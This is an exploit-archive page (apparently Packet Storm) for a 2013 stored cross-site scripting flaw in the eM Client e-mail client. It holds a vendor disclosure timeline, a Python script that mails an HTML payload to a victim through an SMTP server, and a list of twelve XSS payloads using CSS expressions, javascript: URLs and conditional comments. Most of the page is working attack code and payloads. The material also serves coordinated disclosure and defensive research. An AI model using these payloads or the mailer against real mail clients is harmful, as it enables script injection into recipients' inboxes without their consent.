what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eM Client 5.0.18025.0 Cross Site Scripting

eM Client 5.0.18025.0 Cross Site Scripting
Posted Sep 10, 2013
Authored by loneferret

eM Client e-mail client version 5.0.18025.0 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 58d63f0347684b64df7ea221869f6c49d7b63d4b6ed451c1bfe8a5229f8066e7

eM Client 5.0.18025.0 Cross Site Scripting

Change Mirror Download
#!/usr/bin/python
'''

Author: loneferret of Offensive Security
Date: 22-08-2013
Product: eM Client for Windows
Version: 5.0.18025.0 (previous versions and other platforms may be vulnerable)
Vendor Site: http://www.emclient.com/
Software Download: http://www.emclient.com/download

Tested on: Windows XP Pro SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
eM Client: Using default settings


E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you
get an annoying alert box etc etc etc.
Injection Point: Body

Gave vendor 7 days to reply in order to co-ordinate a release date.
Timeline:
23 Aug 2013: Tentative release date 30 Aug 2013
23 Aug 2013: Vulnerability reported to vendor. Provided a list of payloads
26 Aug 2013: No response from vendor, sent a reminder email
27 Aug 2013: Vendor responded, will issue update to fix within 14 days
27 Aug 2013: Tentative release date pushed to September 10th 2013
27 Aug 2013: Replied to vendor with new date
09 Sep 2013: Contacted vendor with remainder of release date
09 Sep 2013: Vendor responded with go ahead with release
10 Sep 2013: Public release

'''

import smtplib, urllib2

payload = '''<DIV STYLE="background-image: url(javascript:alert('XSS'))">'''

def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: hacker@offsec.local\n"
msg += "To: victim@offsec.local\n"
msg += 'Date: Today\r\n'
msg += "Subject: XSS payload\n"
msg += "Content-type: text/html\n\n"
msg += payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()

username = "test@test.com"
password = "123456"
dstemail = "test@test.com"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.61.165"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

'''
# Payloads
[+] Payload 1 : DIV background-image 1
[+] Code for 1 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
------------
[+] Payload 2 : DIV background-image 2
[+] Code for 2 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
------------
[+] Payload 3 : DIV expression
[+] Code for 3 : <DIV STYLE="width: expression(alert('XSS'));">
------------
[+] Payload 4 : IMG STYLE w/expression
[+] Code for 4 : exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
------------
[+] Payload 5 : List-style-image
[+] Code for 5 : <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
------------
[+] Payload 6 : STYLE w/Comment
[+] Code for 6 : <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
------------
[+] Payload 7 : STYLE w/Anonymous HTML
[+] Code for 7 : <XSS STYLE="xss:expression(alert('XSS'))">
------------
[+] Payload 8 : STYLE w/background-image
[+] Code for 8 : <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
------------
[+] Payload 9 : TABLE
[+] Code for 9 : <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
------------
[+] Payload 10 : TD
[+] Code for 11 : <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
------------
[+] Payload 12 : Commented-out Block
[+] Code for 12 : <!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
----
'''

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close